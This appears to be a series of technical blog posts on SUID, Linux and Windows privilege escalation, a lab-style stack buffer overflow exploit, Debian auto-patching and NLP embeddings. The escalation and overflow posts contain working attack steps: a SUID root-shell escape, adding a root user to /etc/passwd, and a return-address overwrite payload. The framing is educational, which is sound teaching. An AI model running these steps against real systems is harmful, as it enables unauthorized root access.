In the world of Linux security, SUID (Set User ID) is a powerful but potentially dangerous feature that allows controlled privilege elevation. This article will walk through how SUID works, illustrate its effects with a C program example, and explore how improper handling of SUID binaries can lead to privilege escalation.
What is SUID?
SUID, or Set User ID, is a special permission flag in Unix-like operating systems that allows a user to execute a file
with the permissions of the file’s owner, rather than their own. This is particularly useful when certain tasks require
elevated privileges. For example, the passwd command uses SUID to allow any user to change their password, though the
actual file manipulations need root access.
SUID permission can be set using the chmod command with the octal value 4 in front of the file permissions. A SUID
binary might look something like this in a directory listing:
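A classic example is passwd itself (the exact size and date will differ per system):

```shell
# Inspect a well-known SUID binary
ls -l /usr/bin/passwd
# -rwsr-xr-x 1 root root ... /usr/bin/passwd
```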
The s in the permission string indicates that the SUID bit is set.
Finding SUID Binaries
SUID binaries can be located with the find command. This is useful both for security auditing and for understanding
which executables can perform actions with elevated privileges.
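One common invocation looks like this:

```shell
# Search the whole filesystem for files with the SUID bit set,
# discarding permission-denied noise
find / -perm -4000 -type f 2>/dev/null
```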
This command searches the entire filesystem for files that have the SUID bit set. Be cautious with these binaries, as
any misconfiguration can expose the system to privilege escalation.
Building a Program to Understand SUID
Let’s construct a simple C program to see the effects of SUID in action and learn how real and effective user IDs (UIDs)
behave.
Here’s our initial program, which will print both the Real UID (RUID) and the Effective UID (EUID). These IDs help
determine the permissions available during program execution:
To compile the program, use:
On the first run of this program, it’ll pick up the same id (the current executing user) for both the real and
effective UID:
We can escalate these privileges here through the use of sudo:
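Running under sudo, both IDs become root's:

```shell
sudo ./suid_demo
# Real UID (RUID): 0
# Effective UID (EUID): 0
```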
Using sudo is cheating though. We want to demonstrate SUID.
Adding SUID
We’ll set the program’s SUID bit so it can be run with elevated privileges:
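Assuming our binary is called suid_demo: for the bit to grant root privileges, the file must first be owned by root.

```shell
# The binary must be root-owned for SUID to elevate to root
sudo chown root:root suid_demo
# Set the SUID bit (the leading 4 in octal notation)
sudo chmod 4755 suid_demo
```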
If we re-run this program now, our real and effective UIDs are different:
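Running it again as our UID-1000 user:

```shell
./suid_demo
# Real UID (RUID): 1000
# Effective UID (EUID): 0
```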
Now, our Effective UID (EUID) is 0, meaning we have root privileges, while the Real UID (RUID) remains our original
user ID.
Adding setuid
Calling setuid(0) explicitly sets the Real UID and Effective UID to 0, making the process a full superuser. This call only succeeds because the SUID bit has already given us an effective UID of 0, and it is often necessary to maintain root access throughout the program’s execution.
Now that we have setuid in place, executing this program as our standard (1000) user gives us this result:
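Both IDs now report root:

```shell
./suid_demo
# Real UID (RUID): 0
# Effective UID (EUID): 0
```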
With this call, both the Real and Effective UID will be set to 0, ensuring root-level privileges throughout
the execution.
Security Implications of SUID
SUID binaries, when not managed carefully, can introduce security vulnerabilities. Attackers can exploit misconfigured
SUID programs to gain unauthorized root access. A few best practices include:
Minimizing SUID Binaries: Only use SUID where absolutely necessary, and regularly audit the system for SUID binaries.
Code Review: Ensure that all SUID programs are thoroughly reviewed for security vulnerabilities, particularly around system calls like system(), which could potentially be hijacked.
Conclusion
In this post, we explored how SUID works, implemented a program to observe its effects on Real and Effective UIDs, and
demonstrated the power of privilege escalation. While SUID is a useful tool for certain applications, it must be
carefully managed to avoid security risks. By understanding SUID, Linux administrators and developers can better protect
their systems against privilege escalation attacks.
Privilege escalation is a critical concept in cybersecurity, allowing an attacker to gain higher-level access to systems
by exploiting specific weaknesses. This process often enables adversaries to move from limited user roles to more
powerful administrative or root-level access. In this article, we’ll dive into several common privilege escalation
techniques on both Linux and Windows systems, covering methods such as exploiting SUID binaries, weak permissions,
and kernel vulnerabilities.
Privilege Escalation
Privilege escalation attacks typically fall into two categories:
Vertical Privilege Escalation: This occurs when a user with lower privileges (e.g., a standard user) gains access to higher privileges (e.g., an admin or root level).
Horizontal Privilege Escalation: In this case, an attacker remains at the same privilege level but accesses resources or areas they typically shouldn’t have access to.
This article focuses on vertical privilege escalation techniques on Linux and Windows systems.
Linux
Exploiting SUID Binaries
In Linux, binaries with the SUID (Set User ID) bit set run with the privileges of the file owner rather than the
user executing them. A misconfigured SUID binary owned by root can be exploited to execute code with root privileges.
To locate SUID binaries, use:
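The same search we used earlier applies here:

```shell
# Find all SUID files, suppressing permission errors
find / -perm -4000 -type f 2>/dev/null
```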
Once located, inspect the binary for potential exploitation. Well-known binaries like find, vim, or perl can often be abused if the SUID bit has been set on them incorrectly. For instance:
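If find itself is SUID root, its -exec option can spawn a root shell (this is the well-known GTFOBins-style escape; sh -p preserves the effective UID rather than dropping it):

```shell
# Run a privilege-preserving shell from a SUID find binary
find . -exec /bin/sh -p \; -quit
```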
Weak File Permissions
Misconfigured permissions can lead to privilege escalation when files essential to the system or owned by
higher-privilege users are writable by lower-privilege accounts.
As an example, if an attacker can write to /etc/passwd, they can add a new user with root privileges:
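A sketch of that attack (the username rootme and password are ours; the hash placeholder must be replaced with the value openssl prints):

```shell
# Generate an MD5-crypt hash for the chosen password
openssl passwd -1 pass123
# Append a UID-0 user using the hash printed above, then switch to it
echo 'rootme:<hash-from-above>:0:0:root:/root:/bin/bash' >> /etc/passwd
su rootme
```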
Alternatively, a writable /etc/shadow file can enable password manipulation for privileged users.
Kernel Exploits
Linux kernel vulnerabilities are a frequent target for privilege escalation, especially in environments where patching
is delayed. It is critical to stay patched and up to date, and to keep an eye on public exploit databases to stay ahead.
Cron Jobs and PATH Exploits
If cron jobs are running scripts with elevated privileges and the script location or PATH variable is misconfigured,
attackers may be able to manipulate the outcome.
For instance, if a cron job executes a script owned by root from /tmp, an attacker can replace or edit this script to
run commands with root privileges.
Exploiting Misconfigured Capabilities
Linux capabilities allow fine-grained control of specific root privileges for binaries. For instance, a binary with
CAP_SETUID capability can change user IDs without full root access. Misconfigured capabilities can be listed with:
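```shell
# Recursively list file capabilities across the filesystem,
# discarding permission errors
getcap -r / 2>/dev/null
```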
Windows
Misconfigured Service Permissions
In Windows, services running as SYSTEM or Administrator can be exploited if lower-privilege users have permission to modify them.
To enumerate services with exploitable permissions, use PowerShell:
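One common starting point is to list services and their executable paths (filtering out standard Windows services is our heuristic for spotting third-party candidates):

```powershell
# Enumerate services and their binaries; services outside
# C:\Windows are the usual suspects for weak permissions
Get-WmiObject -Class win32_service |
    Select-Object Name, StartMode, PathName |
    Where-Object { $_.PathName -notlike 'C:\Windows\*' }
```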
Tools like AccessChk can also help determine whether services are misconfigured:
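For example, to check which services ordinary authenticated users can reconfigure:

```powershell
# List services writable by members of "Authenticated Users"
accesschk.exe -uwcqv "Authenticated Users" *
```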
If a service is found to be modifiable, an attacker could replace the executable path with a malicious file to run as SYSTEM.
DLL Hijacking
Windows programs often load DLLs from specific directories in a defined order. If a high-privilege process loads a DLL
from a directory where an attacker has write access, they can place a malicious DLL in that directory to achieve code
execution at a higher privilege level.
To locate DLL loading paths, analyze process dependencies with tools like Process Monitor.
Weak Folder Permissions
Folder permissions can escalate privileges if users can write to directories containing executables or scripts used by
high-privilege processes.
An attacker could replace a legitimate executable in a writable directory to execute malicious code. Check for writable
directories in the PATH:
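A quick sketch using icacls (look for write access granted to Everyone or BUILTIN\Users in the output):

```powershell
# Show the ACL of every directory on PATH
$env:Path -split ';' | Where-Object { $_ } | ForEach-Object { icacls $_ }
```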
Token Impersonation
In Windows, processes running as SYSTEM can often create impersonation tokens, allowing privileged processes to
temporarily “impersonate” another user. Attackers can exploit tokens left by privileged processes to escalate privileges
using tools like Incognito or PowerShell.
For instance, PowerShell can be used to list tokens available:
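The standard first step is to inspect the privileges held by the current token:

```powershell
# SeImpersonatePrivilege here is a classic starting point
# for token-impersonation attacks
whoami /priv
```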
Kernel Vulnerabilities
As with Linux, Windows kernel exploits also appear regularly in public exploit databases. Make sure you’re always
patched and on top of the latest issues.
Conclusion
Privilege escalation is a critical step in many cyberattacks, allowing attackers to move from restricted to privileged
roles on a system. For both Linux and Windows, attackers leverage vulnerabilities in service configurations,
permissions, and system processes to achieve this goal. Security professionals must stay informed about these techniques
and patch, configure, and monitor systems to defend against them.
Regularly auditing permissions, keeping software up-to-date, and minimizing the attack surface are essential to
mitigating privilege escalation risks. By understanding and addressing these common methods, organizations can
significantly reduce the potential for unauthorized privilege escalation.
Buffer overrun exploits (also known as buffer overflow attacks) are one of the most well-known and dangerous types of
vulnerabilities in software security. These exploits take advantage of how a program manages memory—specifically, by
writing more data to a buffer (an allocated block of memory) than it can safely hold. When this happens, the excess data
can overwrite adjacent memory locations, potentially altering the program’s control flow or causing it to behave
unpredictably.
Attackers can exploit buffer overruns to inject malicious code or manipulate the system to execute arbitrary
instructions, often gaining unauthorized access to the target system. Despite being a well-studied vulnerability, buffer
overflows remain relevant today, particularly in low-level languages like C and C++, which allow direct memory
manipulation.
In this post, we’ll take a closer look at buffer overrun exploits, how they work, and explore some real-world code
examples in C that demonstrate this vulnerability. By understanding the mechanics behind buffer overflows, we can also
better understand how to mitigate them.
Disclaimer: The code in this article is purely for demonstration purposes. We use some intentionally unsafe
techniques to set up an exploitable scenario. DO NOT use this code in production applications, ever.
Password Validator Example
In the following example, the program will ask for input from the user and validate it against a password stored on the
server.
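A sketch of the program (function bodies and messages are our reconstruction; check_password is covered in its own section below):

```c
#include <stdio.h>
#include <stdlib.h>

// Compares the attempt against the stored password (defined later)
int check_password(const char *attempt);

void do_super_admin_things(void) {
    printf("Welcome, admin!\n");
    // A shell stands in for whatever privileged work this guards
    system("/bin/sh");
}

int validate_password(void) {
    char password_attempt[64];
    printf("Enter password: ");
    // DANGEROUS: gets() performs no bounds checking
    gets(password_attempt);
    return check_password(password_attempt);
}

int main(void) {
    if (validate_password()) {
        do_super_admin_things();
    } else {
        printf("Access denied.\n");
    }
    return 0;
}
```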
do_super_admin_things is our example. It might be an admin shell, or something else. The point is this program is
trying to control access to that function by making sure you have the password, first!
The validate_password function is responsible for getting that password in from the outside world. It prompts the user,
then reads from stdin. Note the use of gets().
Warning About gets
The usage of gets() here is highly frowned upon because of how insecure it is. Below are notes from the man page for
it:
BUGS
Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.
The Library Functions Manual makes it clear. It’s such a horrible function security-wise that it was marked obsolescent
in C99 (§7.26.13) and removed outright in C11:
The gets function is obsolescent, and is deprecated.
If there’s one thing to learn from this section, it’s don’t use gets().
To get this code to compile, I had to relax some of the standard rules and mute certain warnings:
Checking the Password
The check_password function reads a file from disk that contains the super-secret password, then compares the attempt
to the correct password.
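A sketch of that function (the file name password.txt and buffer size are our assumptions):

```c
#include <stdio.h>
#include <string.h>

// Reads the stored password from disk and compares it with the attempt
int check_password(const char *attempt) {
    char correct[64] = {0};
    FILE *fp = fopen("password.txt", "r");
    if (fp == NULL) {
        return 0;
    }
    if (fgets(correct, sizeof(correct), fp) == NULL) {
        fclose(fp);
        return 0;
    }
    fclose(fp);
    correct[strcspn(correct, "\n")] = '\0';  // strip trailing newline
    return strcmp(attempt, correct) == 0;
}
```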
Crashes
Initially, if you provide any normal input, the program behaves as expected:
But if you push the input a bit further, exceeding the bounds of the password_attempt buffer, you can trigger a crash:
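For example, 100 bytes of input comfortably overruns the 64-byte buffer:

```shell
python3 -c 'print("A" * 100)' | ./vuln1
```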
The program crashes due to a segmentation fault. Checking dmesg gives us more information:
Notice the 41414141 pattern. This is significant because it shows that the capital A’s from our input (0x41 in
hexadecimal) are making their way into the instruction pointer (ip). The input we provided has overflowed into crucial
parts of the stack, including the instruction pointer.
You can verify that 0x41 represents ‘A’ by running the following command:
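```shell
printf '\x41\n'
# A
```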
Controlling the Instruction Pointer
This works because the large input string is overflowing the password_attempt buffer. This buffer is a local variable
in the validate_password function, and in the stack, local variables are stored just below the return address. When
password_attempt overflows, the excess data overwrites the return address on the stack. Once overwritten, we control
what address the CPU will jump to after validate_password finishes.
Perhaps we could find the address of the do_super_admin_things function and simply jump directly to it. To do this, we
need that address. Only the name of the function is available to us in the source code, and the address is determined at
compile time, so we need to lean on some other tools to gather this intel.
By using objdump we can take a look inside of the compiled executable and get this information.
This will decompile the vuln1 program and give us the location of each of the functions. We search for the function
that we want (do_super_admin_things):
We find that it’s at address 00001316. We need to take note of this value as we’ll need it shortly.
Now we need to find exactly where, within that big run of A’s we’re sending as input, our injected address must sit in
order to land on the saved return address. We’ve already got some inside knowledge about our buffer: it’s 64 bytes in
length.
What we need is a recognizable marker in the input so we can tell which offset ends up in the return address. We can do
that with some well-known payload data. We re-run the program with our 64 A’s, but add a pattern of characters afterwards:
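```shell
# 64 A's fill the buffer; the BBBBCCCCDDDDEEEEFFFF marker reveals
# which four bytes land in the saved return address
python3 -c 'print("A" * 64 + "BBBBCCCCDDDDEEEEFFFF")' | ./vuln1
```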
This seg faults again, but you can see the BBBBCCCCDDDDEEEEFFFF at the end of the 64 A’s. Looking at the log in
dmesg now:
The 45454545 tells us which part of the input is being used as the return address: \x45 is ‘E’, so the instruction
pointer is being filled with the E’s.
Prepare the Payload
To make life easier for us, we’ll write a python script that will generate this payload for us. Note that this is using
our function address from before.
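A sketch of that script, saved as payload.py. The target address is our example: 0x1316 from objdump plus the 0x56555000 base observed at runtime; adjust it for your own binary.

```python
import struct
import sys

# Address of do_super_admin_things (adjust for your binary)
target_addr = 0x56556316

payload = b"A" * 64   # fill password_attempt
payload += b"B" * 12  # padding up to the saved return address
payload += struct.pack("<I", target_addr)  # little-endian 32-bit address

sys.stdout.buffer.write(payload + b"\n")
```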
We can now inject this into the execution of our binary and achieve a shell:
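```shell
# The trailing cat keeps stdin open after the payload is sent,
# so the spawned shell remains usable
(python3 payload.py; cat) | ./vuln1
```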
We use (python3 payload.py; cat) here because of the shell’s handling of file descriptors. If we simply piped the
payload in, stdin would be closed as soon as the pipe drained and the spawned shell would exit immediately; the trailing
cat keeps stdin open.
Static vs. Runtime Addresses
When we run our program normally, modern operating systems apply Address Space Layout Randomization (ASLR), which
shifts memory locations randomly each time the program starts. ASLR is a security feature that makes it more challenging
for exploits to rely on hardcoded memory addresses, because the memory layout changes every time the program is loaded.
For example, if we inspect the runtime address of do_super_admin_things in GDB, we might see something like:
This differs from the objdump address 0x1316, as it has been shifted by the base address of the executable
(e.g., 0x56555000 in this case). This discrepancy is due to ASLR.
Temporarily Disabling ASLR for Demonstration
To ensure the addresses in objdump match those at runtime, we can temporarily disable ASLR. This makes the program
load at consistent addresses, which is useful for demonstration and testing purposes.
To disable ASLR on Linux, run:
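```shell
# 0 = ASLR disabled (system-wide)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```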
This command disables ASLR system-wide. Be sure to re-enable ASLR after testing by setting the value back to 2:
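```shell
# 2 = full randomization (the usual default)
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
```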
Conclusion
In this post, we explored the mechanics of buffer overflow exploits, walked through a real-world example in C, and
demonstrated how ASLR impacts the addresses used in an exploit. By leveraging objdump, we could inspect static
addresses, but we also noted how runtime address randomization, through ASLR, makes these addresses unpredictable.
Disabling ASLR temporarily allowed us to match objdump addresses to those at runtime, making the exploit demonstration
clearer. However, this feature highlights why modern systems adopt ASLR: by shifting memory locations each time a
program runs, ASLR makes it significantly more difficult for attackers to execute hardcoded exploits reliably.
Understanding and practicing secure coding, such as avoiding vulnerable functions like gets() and implementing stack
protections, is crucial in preventing such exploits. Combined with ASLR and other modern defenses, these practices
create a layered approach to security, significantly enhancing the resilience of software.
Buffer overflows remain a classic but essential area of study in software security. By thoroughly understanding their
mechanisms and challenges, developers and security researchers can better protect systems from these types of attacks.
Keeping your Linux servers up to date with the latest security patches is critical. Fortunately, if you’re running a
Debian-based distribution (like Debian or Ubuntu), you can easily automate this process using unattended-upgrades. In
this guide, we’ll walk through setting up automatic patching with unattended-upgrades, configuring a schedule for
automatic reboots after updates, and setting up msmtp to send email notifications from your local Unix mail account.
Installation
The first step is to install unattended-upgrades, which will automatically install security (and optionally other)
updates on your server. Here’s how to do it:
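```shell
sudo apt update
sudo apt install unattended-upgrades
```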
After installation, you’ll want to enable unattended-upgrades:
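```shell
sudo dpkg-reconfigure --priority=low unattended-upgrades
```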
This will configure your server to automatically install security updates. However, you can customize the configuration
to also include regular updates if you prefer.
Configuration
By default, unattended-upgrades runs daily, but you can configure it further by adjusting the automatic reboot
settings to ensure that your server reboots after installing updates when necessary.
Automatic Updates
Edit the unattended-upgrades configuration file:
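```shell
sudo nano /etc/apt/apt.conf.d/50unattended-upgrades
```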
Make sure the file has the following settings to apply both security and regular updates:
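The relevant section is Allowed-Origins; uncommenting the security and updates origins enables both:

```
Unattended-Upgrade::Allowed-Origins {
        "${distro_id}:${distro_codename}";
        "${distro_id}:${distro_codename}-security";
        "${distro_id}:${distro_codename}-updates";
};
```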
Automatic Reboots
You can also configure the server to automatically reboot after installing updates (useful when kernel updates require a
reboot). To do this, add or modify the following lines in the same file:
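The reboot time shown here is our choice; pick a window that suits your environment:

```
Unattended-Upgrade::Automatic-Reboot "true";
Unattended-Upgrade::Automatic-Reboot-Time "02:00";
```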
Testing and Dry Runs
To give this a quick test, you can use the following:
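```shell
# Simulate an upgrade run without installing anything
sudo unattended-upgrade --dry-run --debug
```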
Email Notification
In the same file, you can simply add the email address that you’d like to notify:
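The address here is a placeholder for your own:

```
Unattended-Upgrade::Mail "you@example.com";
```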
You may need to configure your Debian machine to be able to send email. For this, we’ll use msmtp, which can relay
emails. I use gmail, but you can use any provider.
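```shell
sudo apt install msmtp msmtp-mta
```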
Configuration
Open up the /etc/msmtprc file. For the password here, I needed to use an “App Password” from Google (specifically).
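A sketch of the configuration for Gmail (addresses and the app password are placeholders for your own):

```
defaults
auth           on
tls            on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile        /var/log/msmtp.log

account        gmail
host           smtp.gmail.com
port           587
from           you@gmail.com
user           you@gmail.com
password       your-app-password

account default : gmail
```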
Default
You can set msmtp as your default by linking it as sendmail.
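```shell
sudo ln -sf /usr/bin/msmtp /usr/sbin/sendmail
```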
Testing
Make sure your setup for email is working now by sending yourself a test message:
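The recipient address is a placeholder for your own:

```shell
printf "Subject: msmtp test\n\nIt works.\n" | msmtp you@example.com
```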
Conclusion
With unattended-upgrades and msmtp configured, your Debian-based servers will automatically stay up to date with
security and software patches, and you’ll receive email notifications whenever updates are applied. Automating patch
management is crucial for maintaining the security and stability of your servers, and these simple tools make it easy to
manage updates with minimal effort.
In our previous posts,
we explored traditional text representation techniques like One-Hot Encoding, Bag-of-Words, and TF-IDF, and
we introduced static word embeddings like Word2Vec and GloVe. While these techniques are powerful, they have
limitations, especially when it comes to capturing the context of words.
In this post, we’ll explore more advanced topics that push the boundaries of NLP:
Contextual Word Embeddings like ELMo, BERT, and GPT
Dimensionality Reduction techniques for visualizing embeddings
Applications of Word Embeddings in real-world tasks
Training Custom Word Embeddings on your own data
Let’s dive in!
Contextual Word Embeddings
Traditional embeddings like Word2Vec and GloVe generate a single fixed vector for each word. This means the word “bank”
will have the same vector whether it refers to a “river bank” or a “financial institution,” which is a major limitation
in understanding nuanced meanings in context.
Contextual embeddings, on the other hand, generate different vectors for the same word depending on its context.
These models are based on deep learning architectures and have revolutionized NLP by capturing the dynamic nature of
language.
ELMo (Embeddings from Language Models)
ELMo was one of the first models to introduce the idea of context-dependent word representations. Instead of a fixed
vector, ELMo generates a vector for each word that depends on the entire sentence. It uses bidirectional LSTMs
to achieve this, looking both forward and backward in the text to understand the context.
BERT (Bidirectional Encoder Representations from Transformers)
BERT takes contextual embeddings to the next level using the Transformer architecture. Unlike traditional models,
which process text in one direction (left-to-right or right-to-left), BERT is bidirectional, meaning it looks at all
the words before and after a given word to understand its meaning. BERT also uses pretraining and fine-tuning,
making it one of the most versatile models in NLP.
GPT (Generative Pretrained Transformer)
While GPT is similar to BERT in using the Transformer architecture, it is primarily unidirectional and excels at
generating text. This model has been the backbone for many state-of-the-art systems in tasks like
text generation, summarization, and dialogue systems.
Why Contextual Embeddings Matter
Contextual embeddings are critical in modern NLP applications, such as:
Named Entity Recognition (NER): Contextual models help disambiguate words with multiple meanings.
Machine Translation: These embeddings capture the nuances of language, making translations more accurate.
Question-Answering: Systems like GPT-3 excel in understanding and responding to complex queries by leveraging context.
To experiment with BERT, you can try the transformers library from Hugging Face:
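A minimal sketch using the standard bert-base-uncased checkpoint (the first run downloads the model); the sentence is chosen so its tokens match the plots discussed below:

```python
import torch
from transformers import AutoModel, AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("bert-base-uncased")
model = AutoModel.from_pretrained("bert-base-uncased")

sentence = "NLP is amazing"
inputs = tokenizer(sentence, return_tensors="pt")

with torch.no_grad():
    outputs = model(**inputs)

# One contextual 768-dimensional vector per token
output = outputs.last_hidden_state
print(output.shape)
```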
The tensor output from this process should look something like this:
Visualizing Word Embeddings
Word embeddings are usually represented as high-dimensional vectors (e.g., 300 dimensions for Word2Vec). While this is
great for models, it’s difficult for humans to interpret these vectors directly. This is where dimensionality reduction
techniques like PCA and t-SNE come in handy.
Principal Component Analysis (PCA)
PCA reduces the dimensions of the word vectors while preserving the most important information. It helps us visualize
clusters of similar words in a lower-dimensional space (e.g., 2D or 3D).
Following on from the previous example, we’ll use the simple embeddings that we’ve generated in the output variable.
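A sketch of the reduction and plot; so this snippet runs on its own, random vectors stand in for output[0].numpy(), and the token labels match the BERT example:

```python
import matplotlib.pyplot as plt
import numpy as np
from sklearn.decomposition import PCA

tokens = ["[CLS]", "nl", "##p", "is", "amazing", "[SEP]"]
embeddings = np.random.rand(len(tokens), 768)  # stand-in for output[0].numpy()

# Reduce the 768 dimensions down to 2 principal components
pca = PCA(n_components=2)
reduced = pca.fit_transform(embeddings)

plt.figure(figsize=(8, 6))
plt.scatter(reduced[:, 0], reduced[:, 1])
for i, token in enumerate(tokens):
    plt.annotate(token, (reduced[i, 0], reduced[i, 1]))
plt.title("BERT token embeddings (PCA)")
plt.show()
```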
You should see a plot similar to this:
This is a scatter plot in which the 768 dimensions of each embedding have been reduced to two principal components using
Principal Component Analysis (PCA), allowing us to plot them in two-dimensional space.
Some observations when looking at this chart:
Special Tokens [CLS] and [SEP]
These special tokens are essential in BERT. The [CLS] token is typically used as a summary representation for the
entire sentence (especially in classification tasks), and the [SEP] token is used to separate sentences or indicate
the end of a sentence.
In the plot, you can see [CLS] and [SEP] are far apart from other tokens, especially [SEP], which has a distinct
position in the vector space. This makes sense since their roles are unique compared to actual word tokens like “amazing”
or “is.”
Subword Tokens
Notice the token labeled ##p. This represents a subword. BERT uses a WordPiece tokenization algorithm, which
breaks rare or complex words into subword units. In this case, “NLP” has been split into nl and ##p because BERT
doesn’t have “NLP” as a whole word in its vocabulary. The fact that nl and ##p are close together in the plot
indicates that BERT keeps semantically related parts of the same word close in the vector space.
Contextual Similarity
The tokens “amazing” and “is” are relatively close to each other, which reflects that they are part of the same sentence
and share a contextual relationship. Interestingly, “amazing” is a bit more isolated, which could be because it’s a more
distinctive word with a strong meaning, whereas “is” is a more common auxiliary verb and closer to other less distinctive
tokens.
Distribution and Separation
The distance between tokens shows how BERT separates different tokens in the vector space based on their contextual
meaning. For example, [SEP] is far from the other tokens because it serves a very different role in the sentence.
The overall spread of the tokens suggests that BERT embeddings can clearly distinguish between different word types
(subwords, regular words, and special tokens).
t-SNE (t-Distributed Stochastic Neighbor Embedding)
t-SNE is another popular technique for visualizing high-dimensional data. It captures both local and global
structures of the embeddings and is often used to visualize word clusters based on their semantic similarity.
I’ve continued on from the code that we’ve been using:
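As with the PCA sketch, random vectors stand in for the BERT output so the snippet runs on its own; note that t-SNE's perplexity must be smaller than the number of samples:

```python
import matplotlib.pyplot as plt
import numpy as np
from sklearn.manifold import TSNE

tokens = ["[CLS]", "nl", "##p", "is", "amazing", "[SEP]"]
embeddings = np.random.rand(len(tokens), 768)  # stand-in for output[0].numpy()

tsne = TSNE(n_components=2, perplexity=3, random_state=42)
reduced = tsne.fit_transform(embeddings)

plt.figure(figsize=(8, 6))
plt.scatter(reduced[:, 0], reduced[:, 1])
for i, token in enumerate(tokens):
    plt.annotate(token, (reduced[i, 0], reduced[i, 1]))
plt.title("BERT token embeddings (t-SNE)")
plt.show()
```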
The output of which looks a little different to PCA:
There is a different distribution of the embeddings in comparison.
Real-World Applications of Word Embeddings
Word embeddings are foundational in numerous NLP applications:
Semantic Search: Embeddings allow search engines to find documents based on meaning rather than exact keyword matches.
Sentiment Analysis: Embeddings can capture the sentiment of text, enabling models to predict whether a review is positive or negative.
Machine Translation: By representing words from different languages in the same space, embeddings improve the accuracy of machine translation systems.
Question-Answering Systems: Modern systems like GPT-3 use embeddings to understand and respond to natural language queries.
Example: Semantic Search with Word Embeddings
In a semantic search engine, user queries and documents are both represented as vectors in the same embedding space. By
calculating the cosine similarity between these vectors, we can retrieve documents that are semantically related to the
query.
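A sketch of that ranking step; random vectors stand in for real 768-dimensional embeddings:

```python
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity

# Stand-ins for real embeddings (e.g. from BERT)
rng = np.random.default_rng(42)
query_embedding = rng.random((1, 768))
document_embeddings = rng.random((5, 768))

# Similarity of the query to each document, in [-1, 1]
similarities = cosine_similarity(query_embedding, document_embeddings)[0]

# Rank documents from most to least similar
ranked_indices = np.argsort(similarities)[::-1]
print("Similarities:", similarities)
print("Ranked document indices:", ranked_indices)
```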
Walking through this code:
query_embedding and document_embeddings
We generate random vectors to simulate the embeddings. In a real use case, these would come from an embedding model
(e.g., BERT, Word2Vec). The query_embedding represents the vector for the user’s query, and document_embeddings
represents vectors for a set of documents.
Both query_embedding and document_embeddings must have the same dimensionality (e.g., 768 if you’re using BERT).
Cosine Similarity
The cosine_similarity() function computes the cosine similarity between the query_embedding and each document embedding.
Cosine similarity measures the cosine of the angle between two vectors, which ranges from -1 (completely dissimilar) to 1 (completely similar). In this case, we’re interested in documents that are most similar to the query (values close to 1).
Ranking the Documents
We use argsort() to get the indices of the document embeddings sorted in ascending order of similarity.
The [::-1] reverses this order so that the most similar documents appear first.
The ranked_indices gives the document indices, ranked from most similar to least similar to the query.
The output of which looks like this:
Training Your Own Word Embeddings
While pretrained embeddings like Word2Vec and BERT are incredibly powerful, sometimes you need embeddings that are
fine-tuned to your specific domain or dataset. You can train your own embeddings using frameworks like Gensim for
Word2Vec or PyTorch for more complex models.
The following code shows training Word2Vec with Gensim:
The output here is a 100-dimensional vector that represents the word NLP.
Fine-Tuning BERT with PyTorch
You can also fine-tune BERT or other transformer models on your own dataset. This is useful when you need embeddings
that are tailored to a specific domain, such as medical or legal text.
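A minimal fine-tuning sketch (the texts, labels, and hyperparameters are made up for illustration; the first run downloads the model):

```python
import torch
from torch.optim import AdamW
from transformers import AutoModelForSequenceClassification, AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("bert-base-uncased")
model = AutoModelForSequenceClassification.from_pretrained(
    "bert-base-uncased", num_labels=2
)

texts = ["The contract is hereby void.", "The patient presented with fever."]
labels = torch.tensor([0, 1])  # e.g. 0 = legal, 1 = medical

inputs = tokenizer(texts, padding=True, truncation=True, return_tensors="pt")
optimizer = AdamW(model.parameters(), lr=5e-5)

model.train()
for epoch in range(3):
    optimizer.zero_grad()
    outputs = model(**inputs, labels=labels)
    outputs.loss.backward()
    optimizer.step()
    print(f"epoch {epoch}: loss {outputs.loss.item():.4f}")
```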
Conclusion
Word embeddings have come a long way, from static models like Word2Vec and GloVe to dynamic, context-aware
models like BERT and GPT. These techniques have revolutionized how we represent and process language in NLP.
Alongside dimensionality reduction for visualization, applications such as semantic search, sentiment analysis, and
custom embeddings training open up a world of possibilities.